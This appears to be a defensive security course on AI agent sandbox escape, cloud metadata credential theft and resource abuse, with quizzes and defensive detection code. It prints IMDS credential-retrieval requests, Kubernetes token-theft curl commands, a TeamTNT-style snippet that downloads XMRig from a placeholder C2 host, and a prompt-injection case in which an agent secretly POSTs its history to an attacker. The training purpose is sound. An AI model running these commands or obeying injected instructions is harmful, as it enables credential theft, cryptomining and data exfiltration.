Module 6 · Lesson 1

Container Breakout Fundamentals

When the walls that contain an AI agent are thinner than they appear

What documented mechanisms let AI agent workloads escape their intended execution boundary?

In April 2024, security researchers at Wiz disclosed that they had obtained a cross-tenant service account token from within a Hugging Face Spaces container. The token granted read access to private model artifacts belonging to other tenants. The vector was not a kernel exploit; it was an overly permissive IAM role attached to the underlying EC2 instance, reachable from inside any container running on that host via the instance metadata service (IMDS) at 169.254.169.254. The agent workload never needed to escape the container namespace; it simply made an unauthenticated HTTP GET from inside its allowed network context.

Why AI Agent Sandboxes Are Different

Traditional sandboxes confine processes that execute static, known code. AI agent sandboxes must confine processes that generate and execute novel code at runtime — code that the sandbox designer never reviewed. This creates a fundamentally different threat surface. The agent's tool-use loop may invoke shell commands, write files, make outbound network calls, and spawn child processes, all as first-class designed behaviors. The attacker's goal is to chain those permitted behaviors into something the sandbox was not designed to allow.

Sandbox escape in the AI agent context falls into three broad families: namespace escapes (exploiting Linux kernel primitives), metadata service abuse (reaching cloud provider control planes from inside allowed network context), and volume mount exploitation (writing to host-mounted paths). A fourth, increasingly relevant family is agent-driven privilege escalation — where the agent's own tool calls assemble an escape without any single call crossing a policy boundary.

Namespace Escape Primitives

Container runtimes like Docker and containerd isolate workloads using Linux namespaces (PID, NET, MNT, UTS, IPC, USER) and cgroups. Breakouts typically require a privileged capability not stripped at runtime. The most commonly abused:

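CAP_SYS_ADMIN Permits mounting filesystems and dozens of other privileged operations (kernel module loading is governed separately by CAP_SYS_MODULE). A container with this capability can mount additional filesystems, such as a cgroup v1 hierarchy or a host block device it has access to, and, if it can see host processes, use nsenter to enter the host's namespaces. Many AI agent orchestrators grant this for "ease of tool use."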

CAP_SYS_PTRACE Allows attaching to processes in other namespaces when combined with a shared PID namespace. An agent can ptrace the container runtime process itself if PID namespace sharing is enabled.

--privileged flag Grants all capabilities and disables seccomp/AppArmor. Found in production AI agent deployments where operators want to give agents unrestricted tool access. Immediate full host compromise if code execution is achieved inside the container.

Writable /proc/sys/kernel/core_pattern If the host's /proc is mounted or the container has CAP_SYS_ADMIN, writing a pipe command here causes any core dump to execute arbitrary commands as root on the host.

Pentest Enumeration Checklist

From inside a suspected agent container, run: capsh --print to list current capabilities; check mount | grep proc for overmounted /proc; inspect ls -la /var/run/docker.sock for socket exposure; and attempt curl -s http://169.254.169.254/latest/meta-data/ for IMDS reachability. Any of these returning unexpected output indicates a misconfiguration worth escalating.
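
As a rough aid for the capability check, the sketch below decodes the CapEff hex mask from /proc/self/status into the names of the capabilities most relevant to breakouts. Bit positions follow linux/capability.h; the RISKY_CAPS selection and the function names are illustrative choices, not a standard list.

```python
# Bit positions from linux/capability.h. The selection is an assumption:
# capabilities that commonly matter when reviewing breakout risk.
RISKY_CAPS = {
    2: "CAP_DAC_READ_SEARCH",
    12: "CAP_NET_ADMIN",
    16: "CAP_SYS_MODULE",
    17: "CAP_SYS_RAWIO",
    19: "CAP_SYS_PTRACE",
    21: "CAP_SYS_ADMIN",
}


def risky_caps(cap_eff_hex: str) -> list[str]:
    """Return the risky capability names set in a hex CapEff mask."""
    mask = int(cap_eff_hex, 16)
    return [name for bit, name in sorted(RISKY_CAPS.items()) if mask & (1 << bit)]


def read_cap_eff(status_path: str = "/proc/self/status") -> str:
    """Read the CapEff field from a Linux /proc status file."""
    with open(status_path) as fh:
        for line in fh:
            if line.startswith("CapEff:"):
                return line.split()[1]
    raise ValueError("CapEff field not found")
```

Inside a container, risky_caps(read_cap_eff()) gives a quick first reading. Docker's default capability set corresponds to the mask 00000000a80425fb, which contains none of the names above, so any non-empty result suggests the container was started with extra capabilities.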

The Wiz IMDS Attack Path in Detail

The Hugging Face incident illustrates the canonical IMDS attack path. The instance metadata service runs on a link-local address reachable from any process on the EC2 instance, including containers running on it, unless the operator has configured IMDSv2 (which requires a PUT before GET, making it harder to reach from SSRF vectors) and blocked the address at the container network level.

An agent with any outbound HTTP tool capability can silently reach the IMDS and retrieve the instance role credentials in a single tool call. Those credentials may have permissions extending far beyond the agent's intended scope — S3 buckets, Secrets Manager entries, or even IAM privilege escalation paths.

# Tool call the agent makes (appears legitimate)
GET http://169.254.169.254/latest/meta-data/iam/security-credentials/

# Response reveals role name, then:
GET http://169.254.169.254/latest/meta-data/iam/security-credentials/<role-name>

# Returns:
{
  "AccessKeyId": "ASIA...",
  "SecretAccessKey": "...",
  "Token": "...",
  "Expiration": "2023-04-14T18:29:00Z"
}

Defender Note

IMDSv2 alone is insufficient if agents have unrestricted outbound HTTP. The PUT-before-GET requirement stops SSRF-style reaches but not direct tool calls. Network-level blocking of 169.254.169.254 at the container network interface is required. AWS recommends restricting instance profiles to least-privilege and enabling IMDSv2 hop limit of 1 to prevent container-level access.

runc Vulnerabilities (CVE-2019-5736 and Descendants)

CVE-2019-5736, discovered by Adam Iwaniuk and Borys Popławski and disclosed in February 2019, demonstrated that a malicious container could overwrite the host runc binary through a file descriptor to /proc/self/exe obtained while runc was executing inside the container. The technique required the attacker to control code executing inside the container, which is exactly the position an AI agent code-execution tool grants. Patched runc versions closed this specific hole, but the architectural lesson persists: any code executing inside a container can observe and interact with the host runtime's filesystem operations if the runtime itself runs as root without additional namespace isolation.

Subsequent variants (CVE-2021-30465 in runc mount handling, CVE-2022-0492 in the kernel's cgroup v1 release_agent handling) each illustrate the same principle: the boundary between container and host is enforced by a userspace runtime on top of a shared kernel. Any bug in either layer, or any excessive capability granted to the container, collapses the boundary.

Testing Methodology — What Pentesters Look For

When assessing an AI agent deployment for sandbox escape risk, the methodology follows four phases:

Capability enumeration: Identify what Linux capabilities the container process holds. capsh --print, /proc/self/status (CapEff field), and checking --security-opt flags in the orchestration configuration.
Mount surface review: List all bind mounts and volume mounts. Particular attention to any mount that includes a host path containing runtime sockets, /proc subdirectories, or credential stores.
Network reach testing: From inside the container, probe IMDS, the container runtime socket, internal Kubernetes API server (if in a K8s cluster), and any cloud metadata endpoints. Document what is reachable without authentication.
Runtime version fingerprinting: Identify the runc/containerd version and cross-reference against known CVEs. Many production AI agent deployments run on images that are months or years behind on runtime patches.
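
The mount surface review step can be partly automated. The sketch below parses text in the /proc/self/mountinfo format and flags exposed runtime sockets and writable mounts under sensitive paths. The suffix and prefix lists and the finding labels are assumptions chosen for illustration; a real review would extend them for the environment under test.

```python
# Illustrative lists only; extend for the environment under test.
RISKY_SUFFIXES = ("docker.sock", "containerd.sock", "crio.sock")
RISKY_PREFIXES = ("/proc/sys", "/sys/fs/cgroup")


def risky_mounts(mountinfo_text: str) -> list[tuple[str, str]]:
    """Return (mount_point, reason) pairs for mounts worth a closer look."""
    findings = []
    for line in mountinfo_text.splitlines():
        # mountinfo separates per-mount fields from filesystem fields with " - ".
        if " - " not in line:
            continue
        fields = line.split(" - ", 1)[0].split()
        if len(fields) < 6:
            continue
        mount_point, options = fields[4], fields[5].split(",")
        if mount_point.endswith(RISKY_SUFFIXES):
            findings.append((mount_point, "runtime socket exposed"))
        elif "rw" in options and mount_point.startswith(RISKY_PREFIXES):
            findings.append((mount_point, "writable sensitive path"))
    return findings
```

Calling risky_mounts(open("/proc/self/mountinfo").read()) from inside the container returns the mounts to examine by hand. An empty result does not prove the mount surface is safe; it only means none of the listed patterns matched.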

Real CVE Reference

CVE-2022-0492 (CVSS 7.8): A missing capability check in the Linux kernel's cgroup v1 release_agent handling allowed a process inside a container to escape to the host if the container held CAP_SYS_ADMIN, or if it could create a new user namespace and was not confined by seccomp, AppArmor, or SELinux. This remained unpatched in many cloud provider managed Kubernetes node images for over three months after disclosure. AI agent workloads on those node versions were escapable whenever the agent could execute shell commands and those preconditions held.
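
Because the flaw is specific to cgroup v1, one early triage question is whether the workload sits on a v1 hierarchy at all. The sketch below answers that from the contents of /proc/self/cgroup, where v1 entries name a controller in the second field and a pure cgroup v2 host shows a single "0::" line. The function name is hypothetical, and a True result is only one precondition: kernel patch level and confinement still decide exploitability.

```python
def uses_cgroup_v1(proc_cgroup_text: str) -> bool:
    """Return True if any /proc/<pid>/cgroup line names a v1 hierarchy."""
    for line in proc_cgroup_text.splitlines():
        # Format: hierarchy-ID:controller-list:cgroup-path
        parts = line.split(":", 2)
        if len(parts) == 3 and parts[1] != "":
            return True
    return False
```

On a live system the input would come from open("/proc/self/cgroup").read(). Hybrid hosts list both v1 controllers and a "0::" entry, and this check reports them as v1.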

Lesson 1 Quiz

Container Breakout Fundamentals · 3 questions

In the 2024 Wiz Hugging Face Spaces disclosure, what was the primary mechanism that allowed cross-tenant credential access?

Correct. The escape did not require a kernel exploit. The IMDS at 169.254.169.254 was reachable from inside the container, and the EC2 instance role had excessive permissions extending to other tenants' artifacts. This is a configuration error, not a software vulnerability.

Incorrect. The Wiz researchers did not use a kernel capability exploit. The vector was the AWS Instance Metadata Service, reachable via a plain HTTP GET from inside the container's allowed network context.

Which Linux capability, if present in a container, most directly enables mounting the host filesystem and re-entering the host namespace?

Correct. CAP_SYS_ADMIN is the broadest and most dangerous Linux capability. It permits mounting filesystems and a wide range of other privileged operations that allow a process to step outside its container namespace. It is sometimes granted to AI agent containers that need to run Docker-in-Docker or access low-level tools.

Incorrect. While CAP_NET_ADMIN and CAP_SYS_PTRACE are dangerous, CAP_SYS_ADMIN is the capability that most directly enables host namespace escape through mount operations and related privileged system calls.

CVE-2022-0492 is significant for AI agent security because:

Correct. CVE-2022-0492 exploited the Linux cgroup v1 release_agent mechanism to escape containers. Its significance in the AI context is that many production agent deployments ran on unpatched Kubernetes node images for an extended period after disclosure, leaving any agent capable of shell execution in a position to escape to the host.

Incorrect. CVE-2022-0492 is a Linux kernel vulnerability affecting cgroup v1 release_agent handling, allowing container escape — not a prompt injection or model artifact exposure issue.

Lab 1: Container Reconnaissance

Practice identifying escape vectors from inside a simulated agent container

Scenario

You are a pentester who has achieved code execution inside an AI agent container. Your task is to enumerate the escape surface: capabilities, mounts, network reach, and runtime version. The AI assistant will guide you through the recon process, explain what each finding means, and help you prioritize which vectors are worth escalating.

Start by asking the assistant what commands you should run first to enumerate your container's Linux capabilities, or describe a finding you want to analyze (e.g., "capsh --print shows cap_sys_admin in the Bounding set — what does that mean for escape?").

Container Recon Assistant

Sandbox Escape Lab

Ready for container recon. I can walk you through capability enumeration, mount surface review, IMDS reachability testing, and runtime version fingerprinting. What would you like to start with — or describe a finding you want me to help interpret?

Module 6 · Lesson 2

Cloud Metadata and Credential Theft

How AI agents reach the control plane without ever leaving their container

What attack paths allow an AI agent to exfiltrate cloud credentials using only its permitted tool capabilities?

The Capital One breach, carried out by Paige Thompson in March 2019 and disclosed that July, is the canonical SSRF-to-IMDS attack case. Thompson exploited a misconfigured WAF running on an EC2 instance, used server-side request forgery to reach 169.254.169.254, retrieved an IAM role credential with broad S3 permissions, and exfiltrated approximately 100 million customer records. While not an AI agent attack, the technique is directly applicable to any agent with an HTTP fetch tool and network access to IMDS. The underlying weaknesses (no IMDSv2 enforcement and an overly permissive instance role) are still reproduced in AI agent deployments today.

The IMDS Attack Surface for AI Agents

Every major cloud provider exposes an instance metadata service reachable from the instance (and its containers) on a well-known link-local address. AWS uses 169.254.169.254; Azure uses the same address for its Instance Metadata Service (alongside 168.63.129.16 for platform functions such as DHCP and health probes); GCP uses the FQDN metadata.google.internal, which resolves to 169.254.169.254. None of the three requires the caller to present a credential: any process in the instance's network namespace that follows the request protocol can retrieve instance credentials.

An AI agent with any HTTP tool — including tools framed as "web browsing," "URL fetcher," "API caller," or "research assistant" — can reach these endpoints. Unlike a human-operated SSRF, the agent may have been instructed by a malicious prompt to make exactly this request while performing an apparently legitimate task.

Provider	Endpoint	Credential Path	Default Protection
AWS	`169.254.169.254`	`/latest/meta-data/iam/security-credentials/<role>`	IMDSv2 (opt-in until 2024); hop-limit 1
Azure	`169.254.169.254`	`/metadata/identity/oauth2/token?api-version=2018-02-01&resource=<resource>` + `Metadata: true` header	Required header: stops basic SSRF but not tool calls
GCP	`metadata.google.internal`	`/computeMetadata/v1/instance/service-accounts/default/token`	Required header: `Metadata-Flavor: Google`

Critical Note

Azure and GCP require a custom header (Metadata: true and Metadata-Flavor: Google respectively). This stops classic SSRF via image tags or redirects, but does NOT stop an AI agent whose HTTP tool can set arbitrary headers. Pentesters must test with full header control, not just bare GET requests.
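
Since header requirements do not stop an agent, a tool-side check has to look at the destination instead. The sketch below is one possible pre-flight guard for an HTTP tool: it rejects link-local addresses, AWS's IPv6 metadata address fd00:ec2::254, and the GCP metadata hostname named above. The function name and host list are assumptions for illustration. The guard does not handle redirects, alternate IP encodings, or hostnames that resolve to metadata addresses, so it complements network-level blocking rather than replacing it.

```python
import ipaddress
from urllib.parse import urlsplit

# Hostname taken from the provider table; extend as needed.
METADATA_HOSTS = {"metadata.google.internal"}
# AWS also serves IMDS over IPv6 at this unique-local address.
METADATA_ADDRS = {ipaddress.ip_address("fd00:ec2::254")}


def is_metadata_target(url: str) -> bool:
    """Return True if the URL points at a known metadata destination."""
    host = (urlsplit(url).hostname or "").rstrip(".").lower()
    if host in METADATA_HOSTS:
        return True
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        # Not an IP literal. A hostname would need re-checking after DNS resolution.
        return False
    return addr.is_link_local or addr in METADATA_ADDRS
```

An HTTP tool wrapper could call is_metadata_target(url) before every request and refuse the call when it returns True, logging the attempt as a high-priority signal.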

Beyond Credentials — What Else IMDS Exposes

Credentials are the most targeted IMDS output, but the endpoint exposes significantly more information useful for lateral movement and escalation:

User data / cloud-init scripts: Often contain hardcoded secrets, bootstrap credentials, or internal API keys. AWS user data is returned at /latest/user-data with no additional authentication.
Instance identity document: Returns account ID, region, instance type, and AMI ID — useful for constructing targeted API calls and identifying the blast radius of compromised credentials.
SSH public keys: In AWS, public keys added via EC2 key pairs are exposed at /latest/meta-data/public-keys/. Knowing the key name and fingerprint narrows the attack surface for lateral SSH movement.
Internal hostname and network topology: Subnet ID, VPC ID, private IP — all useful for mapping the internal network that the agent's instance inhabits.

Kubernetes Service Account Token Theft

When AI agents run inside Kubernetes pods, a different credential source becomes relevant: the service account token automatically mounted at /var/run/secrets/kubernetes.io/serviceaccount/token. This JWT can be used to authenticate to the Kubernetes API server.

The Azurescape vulnerability (disclosed by Palo Alto Networks Unit 42 in September 2021) demonstrated that cross-tenant Kubernetes API access was possible from within a compromised container in Azure Container Instances; the initial breakout reused the runc flaw CVE-2019-5736. An agent capable of reading its own filesystem can exfiltrate the service account token in a single file read operation.

# Agent reads its own service account token:
cat /var/run/secrets/kubernetes.io/serviceaccount/token

# Then queries the K8s API with it, verifying the server against the mounted CA bundle:
SA=/var/run/secrets/kubernetes.io/serviceaccount
curl --cacert "$SA/ca.crt" -H "Authorization: Bearer $(cat "$SA/token")" \
  https://kubernetes.default.svc/api/v1/namespaces/default/secrets

# If the service account has get/list on secrets:
# All secrets in the namespace are now exposed

RBAC Misconfiguration Pattern

The most common Kubernetes RBAC misconfiguration seen in AI agent deployments is granting the agent's service account cluster-admin or wildcard resource access so that the agent can "manage Kubernetes resources as a tool." This gives the agent — and any attacker who controls the agent — full cluster access from within a single pod.
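
A quick way to surface this pattern during an assessment is to scan the rules of the Role or ClusterRole bound to the agent's service account. The sketch below assumes the rules have already been exported as a list of dictionaries in the standard RBAC shape (apiGroups, resources, verbs); the function name and finding strings are hypothetical.

```python
READ_VERBS = {"get", "list", "watch", "*"}


def risky_rbac_rules(rules: list[dict]) -> list[str]:
    """Flag wildcard grants and rules that allow reading secrets."""
    findings = []
    for i, rule in enumerate(rules):
        verbs = set(rule.get("verbs", []))
        resources = set(rule.get("resources", []))
        if "*" in verbs and "*" in resources:
            findings.append(f"rule {i}: wildcard verbs on wildcard resources")
        elif ({"secrets", "*"} & resources) and (READ_VERBS & verbs):
            findings.append(f"rule {i}: can read secrets")
    return findings
```

The input could be taken from the rules field of kubectl get clusterrole <name> -o json. The check is deliberately narrow: it ignores resourceNames restrictions and escalation verbs such as bind or impersonate, which a full review would also cover.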

Exfiltration Paths via Agent Tool Chains

Once credentials are obtained, the agent's existing tool suite becomes the exfiltration mechanism. An agent with file-write and HTTP-post tools can write credentials to disk, construct a signed AWS API request, and exfiltrate data without invoking any capability outside its normal operation profile. This is why behavioral detection — anomaly detection on tool call sequences — is more reliable than any single policy check.
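
A minimal sketch of sequence-based detection follows: it flags a session in which the agent touches a credential source and later sends an outbound POST to a host outside an allow-list. The tool names (http_get, http_post, file_read), the marker strings, and the ToolCall shape are all assumptions for illustration; real agent frameworks expose tool calls in their own formats.

```python
from typing import NamedTuple
from urllib.parse import urlsplit


class ToolCall(NamedTuple):
    tool: str    # hypothetical tool name, e.g. "file_read" or "http_post"
    target: str  # file path or URL the call operated on


# Substrings that indicate a credential source was accessed.
CREDENTIAL_MARKERS = ("169.254.169.254", "/var/run/secrets/", ".aws/credentials", ".env")


def flags_exfil_sequence(calls: list[ToolCall], allowed_hosts: set[str]) -> bool:
    """True if a credential access is followed by a POST to an unlisted host."""
    touched_credentials = False
    for call in calls:
        if any(marker in call.target for marker in CREDENTIAL_MARKERS):
            touched_credentials = True
            continue
        if touched_credentials and call.tool == "http_post":
            host = urlsplit(call.target).hostname or ""
            if host not in allowed_hosts:
                return True
    return False
```

Neither call in such a sequence violates a per-call policy on its own, which is why the check is stateful across the session.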

The 2024 PromptArmor research on indirect prompt injection demonstrated live exfiltration from a GPT-4-powered assistant: a malicious document caused the agent to silently POST its conversation history (which included retrieved credentials) to an attacker-controlled endpoint using the agent's own web request tool. The agent reported success on the original task. No error was raised. The exfiltration was invisible in the response.

Pentest Scenario

When testing an AI agent for credential theft risk: (1) Determine whether the agent has any HTTP fetch capability. (2) Check whether 169.254.169.254 is reachable from the agent's network namespace. (3) Attempt a direct IMDS GET as a tool call. (4) Check /var/run/secrets/ for K8s service account tokens. (5) Read any .env, .aws/credentials, or application config files in the agent's working directory. Document all findings — the goal is a complete picture of every credential the agent could access, not just the most obvious one.

Lesson 2 Quiz

Cloud Metadata and Credential Theft · 3 questions

The Capital One 2019 breach technique is directly relevant to AI agents because:

Correct. Thompson's technique — SSRF to 169.254.169.254, retrieve IAM role credentials, use them for data access — is structurally identical to what any agent with HTTP tool access and a reachable IMDS can do. The agent does not need a WAF misconfiguration; the IMDS is its direct target.

Incorrect. The relevance is that the SSRF-to-IMDS attack path requires only an HTTP fetch capability, which most AI agents have, and a reachable IMDS endpoint. No WAF or special misconfiguration beyond IMDS accessibility is required.

Which statement about Azure and GCP IMDS protection is most accurate for AI agent threat modeling?

Correct. The header requirement was designed to prevent SSRF exploits where an attacker cannot control headers (e.g., via an img src tag). An AI agent's HTTP tool typically allows full header specification, bypassing this protection entirely.

Incorrect. AI agent HTTP tools can typically set arbitrary headers. The Metadata: true and Metadata-Flavor: Google headers are trivially included in a tool call, making them ineffective as protection against deliberate agent-based access.

In a Kubernetes-hosted AI agent pod, where is the service account token that could be used to authenticate to the K8s API?

Correct. Kubernetes automatically mounts the pod's service account token at this path by default (unless automountServiceAccountToken is set to false). An agent capable of reading its own filesystem can extract this token with a single file read and use it to authenticate to the Kubernetes API server.

Incorrect. The Kubernetes service account token is automatically mounted as a file at /var/run/secrets/kubernetes.io/serviceaccount/token in every pod unless explicitly disabled.

Lab 2: Credential Theft Simulation

Map IMDS and service account token attack paths for a deployed agent

Scenario

You are assessing an AI agent deployed on AWS EKS (Elastic Kubernetes Service). The agent has a web-browsing tool and file-read capabilities. Your goal is to enumerate all credential sources it can access and assess the blast radius of each. The assistant will help you construct test cases and interpret what you find.

Begin by asking the assistant how to check whether IMDSv2 is enforced on the EKS nodes, or describe a finding you want to analyze (e.g., "The agent can reach 169.254.169.254 — what permissions does the EKS node role typically have?").

Credential Threat Assessment

IMDS / K8s Token Lab

Let's map the credential attack surface for your EKS-hosted agent. I can help you test IMDS reachability and version enforcement, assess the EKS node IAM role permissions, enumerate Kubernetes service account RBAC, and prioritize findings by blast radius. What would you like to examine first?

Module 6 · Lesson 3

Resource Abuse: Compute, Network, and Storage

When AI agents become unwilling participants in cryptomining, DDoS, and data exfiltration

How do attackers leverage AI agent infrastructure for resource abuse, and what forensic signatures distinguish abuse from normal agent behavior?

TeamTNT, tracked by Trend Micro and Cado Security from 2020 onward, specialized in targeting misconfigured container infrastructure for cryptomining. Their technique: scan for exposed Docker daemons (port 2375/2376), deploy XMRig or similar Monero miners, and in later campaigns, specifically target Jupyter notebook servers, an early form of AI/ML compute abuse. By 2021 their tooling included credential harvesters targeting AWS credential files (~/.aws/credentials) and Kubernetes config files. The same infrastructure used to run ML experiments was repurposed for mining within minutes of compromise. Container CPU quotas that should have limited blast radius were absent in the majority of compromised targets.

The Resource Abuse Threat Model for AI Agents

AI agent infrastructure is particularly attractive for resource abuse because it is designed to consume significant compute. Anomalous CPU or memory usage from a cryptominer is easy to spot on a web server, but it blends in with an AI inference workload. Network egress that would trigger alerts on a standard application server is routine for an agent making API calls and fetching external data. This camouflage effect makes AI agent infrastructure a high-value target for attacker-controlled workload injection.

Resource abuse falls into four categories in the AI agent context:

Compute Hijacking Injecting cryptomining, password cracking, or other CPU/GPU-intensive tasks into the agent's execution environment. The agent's allocated compute quota is consumed by attacker workloads.

Network Amplification Using the agent's outbound network access and trusted IP reputation to conduct port scanning, DDoS participation, or spam sending. The agent's IP is unlikely to be blocklisted, while the attacker's own source IPs often are.

Storage Abuse Writing large volumes of data to agent-accessible storage (S3, NFS, local disk) to exhaust quotas, incur costs, or use storage as a staging area for data exfiltrated from other targets.

LLM API Exhaustion Making the agent issue excessive LLM API calls to exhaust rate limits, incur API costs, or probe the underlying model for other tenants' cached context. Specific to AI agent deployments; has no equivalent in traditional application security.

Cryptomining in ML Infrastructure — The Jupyter Attack Surface

Jupyter notebook servers, commonly used to develop and test AI agents, are a documented cryptomining target. Exposed notebooks (no authentication, or with predictable tokens) allow attackers to execute arbitrary Python, which trivially includes subprocess calls to download and run XMRig. The 2020 Aqua Security threat intelligence report documented over 13,000 exposed Jupyter instances and observed cryptomining injection within minutes of exposure for honeypot instances.

The pattern extends to any AI agent framework that exposes a code execution endpoint: LangChain's local server mode, AutoGPT instances with a web interface, and custom agent APIs that allow code submission. Any endpoint that accepts and executes code without authentication is a cryptomining substrate.

# Typical TeamTNT payload delivered via exposed Jupyter notebook:
import subprocess
subprocess.Popen([
    'wget', '-q', 
    'http://[C2-IP]/xmrig', 
    '-O', '/tmp/.cache/xmrig'
])
subprocess.Popen(['chmod', '+x', '/tmp/.cache/xmrig'])
subprocess.Popen([
    '/tmp/.cache/xmrig',
    '--algo', 'rx/0',
    '-o', 'pool.supportxmr.com:3333',
    '--threads', '8'  # 8 mining threads; saturates a host with 8 or fewer vCPUs
])

Detection Signature

XMRig and similar miners generate distinctive network signatures: outbound connections to mining pool hostnames (pool.supportxmr.com, xmrpool.eu, etc.) or pool IPs on ports 3333, 5555, or 4444; Stratum protocol traffic; and sustained high CPU with low memory I/O ratio. AI agent monitoring should include outbound connection destination analysis, not just HTTP content inspection.
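
The destination check described above can be sketched as a small classifier over logged outbound connections. The pool domains and ports are the ones named in this section; the function name and return labels are illustrative. A port match alone is weak evidence, so the labels distinguish the two cases.

```python
from typing import Optional

# Values taken from the detection signature above; both lists are incomplete.
POOL_DOMAINS = ("supportxmr.com", "xmrpool.eu")
STRATUM_PORTS = {3333, 4444, 5555}


def mining_indicator(host: str, port: int) -> Optional[str]:
    """Return a reason string if the destination resembles a mining pool."""
    host = host.lower().rstrip(".")
    for domain in POOL_DOMAINS:
        if host == domain or host.endswith("." + domain):
            return "known pool hostname"
    if port in STRATUM_PORTS:
        return "common Stratum port"
    return None
```

Feeding every unique (host, port) pair from egress logs through mining_indicator gives a short list to correlate with the CPU pattern before raising an alert.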

Network Amplification via Agent Egress

An AI agent's outbound network access is granted for legitimate purposes: fetching URLs, calling APIs, sending notifications. An attacker who controls the agent's prompt can redirect this egress capability. The OWASP Top 10 for LLM Applications lists "Excessive Agency" (LLM08 in the 2023 edition, LLM06 in the 2025 edition): the condition where an agent has more network, compute, or storage access than its task requires. That excess access is directly exploitable for network abuse.

Port scanning from agent infrastructure is particularly damaging because: (1) the agent's IP has a clean reputation, (2) scan traffic appears as normal outbound from a legitimate cloud customer, and (3) the agent can distribute scans across many target IPs in what appears to be routine API calls or URL fetches. This technique has been observed in post-compromise scenarios where compromised CI/CD agents with broad network access were used to scan internal network ranges.

LLM API Cost Abuse

A category unique to AI agent systems: an attacker who can influence the agent's behavior (via prompt injection, malicious tool outputs, or direct API access) can cause it to issue massive numbers of LLM API calls. This does not require code execution — it requires only the ability to cause the agent to enter a loop or process an arbitrarily large input.

The sponge attack technique, described in academic literature by Shumailov et al. (2021), demonstrates that inputs can be crafted to maximize inference compute consumption by targeted LLM deployments. Applied to an agentic system, a crafted document could cause an agent to spend minutes of inference time per document, exhaust its API quota, and either fail its primary task or generate costs that exceed any expected budget.
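
One common mitigation is a hard per-task budget enforced outside the model, so that a crafted input can waste at most a bounded amount of inference. The sketch below is a minimal version under assumed names (TaskBudget, BudgetExceeded); the limits and the way token counts are obtained depend on the LLM client in use.

```python
class BudgetExceeded(RuntimeError):
    """Raised when a task exceeds its call or token allowance."""


class TaskBudget:
    """Tracks LLM calls and tokens for one task and stops runaway loops."""

    def __init__(self, max_calls: int, max_tokens: int) -> None:
        self.max_calls = max_calls
        self.max_tokens = max_tokens
        self.calls = 0
        self.tokens = 0

    def charge(self, tokens: int) -> None:
        """Record one LLM call; raise once either limit is exceeded."""
        self.calls += 1
        self.tokens += tokens
        if self.calls > self.max_calls or self.tokens > self.max_tokens:
            raise BudgetExceeded(
                f"calls={self.calls}/{self.max_calls}, "
                f"tokens={self.tokens}/{self.max_tokens}"
            )
```

The agent loop would call budget.charge(tokens_used) after each model response and abort the task when BudgetExceeded is raised, treating the event as a signal worth investigating rather than a routine failure.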

Cost Abuse Real-World Scale

AWS compute charges accrue continuously, but billing data and the alarms built on it can lag by hours. A misconfigured AI agent with no spending limits that is hijacked for cryptomining or caused to make excessive API calls can generate thousands of dollars in charges before automated billing alerts fire. Organizations running AI agents on cloud infrastructure should set spending limits where the provider supports them (for example, AWS Budgets actions), configure CloudWatch billing alarms, and consider AWS Cost Anomaly Detection as an early warning mechanism.

Forensic Signatures of Resource Abuse

Distinguishing resource abuse from normal AI agent behavior requires baseline-relative analysis. A well-instrumented agent deployment should capture:

CPU utilization curve: Miners cause sustained high CPU with no I/O variance. Normal agents have bursty CPU correlated with task events.
Outbound connection destinations: Log all unique destination IPs and ports. Mining pools, Tor exit nodes, and unfamiliar cloud regions are anomalous for most agent workloads.
File system write patterns: Sudden creation of executable files in /tmp, /dev/shm, or hidden directories is characteristic of malware staging.
Process tree anomalies: Child processes spawned by the agent runtime that are not expected framework processes — particularly processes with randomized names or matching known malware hashes.
LLM API call rate: Track tokens consumed per unit time. A 10× spike in token consumption with no corresponding user-visible output suggests a prompt injection loop.
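
Two of these signals lend themselves to simple baseline-relative checks. The sketch below compares current token consumption against the median of recent history and tests whether CPU samples stay high instead of bursting. The function names, the 10x factor (taken from the list above), and the CPU thresholds are illustrative defaults, not tuned values.

```python
from statistics import median


def token_spike(history: list[int], current: int, factor: float = 10.0) -> bool:
    """True if current token usage is at least `factor` times the median baseline."""
    if not history:
        return False
    baseline = median(history)
    return baseline > 0 and current >= factor * baseline


def sustained_high_cpu(
    samples: list[float], threshold: float = 90.0, min_fraction: float = 0.95
) -> bool:
    """True if nearly all CPU samples exceed the threshold (no bursty pattern)."""
    if not samples:
        return False
    high = sum(1 for s in samples if s >= threshold)
    return high / len(samples) >= min_fraction
```

Using the median rather than the mean keeps a single earlier spike from inflating the baseline. Either signal alone can have an innocent explanation, so both are best treated as inputs to correlation rather than as alerts in their own right.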

Lesson 3 Quiz

Resource Abuse · 3 questions

Why is AI agent infrastructure particularly attractive for cryptomining attackers compared to standard web application servers?

Correct. The camouflage effect is the key differentiator. A spike in CPU from a web server is immediately anomalous; the same spike from an AI inference workload is expected behavior. TeamTNT's targeting of Jupyter and ML infrastructure specifically exploited this fact.

Incorrect. The primary advantage for attackers is camouflage — high CPU from a cryptominer is indistinguishable from legitimate inference load without more detailed behavioral analysis.

The "sponge attack" technique (Shumailov et al., 2021) threatens AI agent deployments by:

Correct. Sponge attacks craft inputs specifically to maximize compute resources consumed during inference. Applied to agents, this can exhaust API quotas, generate unexpected costs, and degrade service for legitimate users — all without requiring code execution or credential access.

Incorrect. Sponge attacks maximize inference compute consumption through specially crafted inputs that cause the model to expend maximum computation. They require no code execution — only the ability to send inputs to the agent.

Which forensic indicator most reliably distinguishes cryptomining from normal AI agent behavior when monitoring process telemetry?

Correct. The combination of sustained high CPU (not event-correlated) plus Stratum protocol connections to mining pool endpoints on characteristic ports is the most reliable dual signal. Either alone could have an innocent explanation in an AI workload; together they are highly indicative of mining activity.

Incorrect. Threshold-based CPU alerts and generic process name monitoring produce too many false positives for AI workloads. The combination of sustained CPU pattern plus specific outbound connection destinations is the more reliable indicator.

Lab 3: Resource Abuse Detection

Analyze telemetry to identify cryptomining and network abuse in an agent workload

Scenario

You are reviewing monitoring data from an AI agent fleet and have noticed anomalies. Your task is to analyze the telemetry, determine whether resource abuse is occurring, identify the abuse type, and recommend containment steps. The assistant will help you interpret signals and construct detection rules.

Start by describing anomalous telemetry you want to analyze (e.g., "Agent CPU is running at 94% for 45 minutes with no active tasks, and I see outbound connections to pool.supportxmr.com:3333"), or ask the assistant how to build a detection baseline for an agent workload.

Resource Abuse Analyst

Compute / Network Abuse Lab

Ready to analyze resource abuse telemetry. I can help you interpret CPU, network, and filesystem signals; distinguish mining from normal inference load; build detection rules; and recommend containment responses. Describe your anomaly or ask me how to establish a behavioral baseline.

Module 6 · Lesson 4

Defenses, Detection, and Hardening

Practical controls that actually reduce sandbox escape and resource abuse risk

